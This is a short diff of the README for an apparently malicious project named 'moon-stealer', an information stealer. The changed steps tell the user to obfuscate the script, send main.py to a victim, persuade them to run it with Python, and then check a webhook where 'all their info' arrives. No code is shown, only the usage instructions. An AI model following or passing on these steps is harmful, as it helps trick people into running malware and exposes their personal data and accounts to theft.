dannythehacker/moon-stealer/README.md

 6. Obfuscate your code: [https://pyobfuscate.com/](https://pyobfuscate.com/pyd) (Recommended)

-7. Send `main.py` to the victim and when they run `main.py`
+7. Send `main.py` to the victim and make them run the file with python.
+(That's why you need python)

-8. Boom!
-Check your webhook.
+8. When they run it...
+BOOM!
+Check your webhook, you will have all their info.

 <a id="features"></a>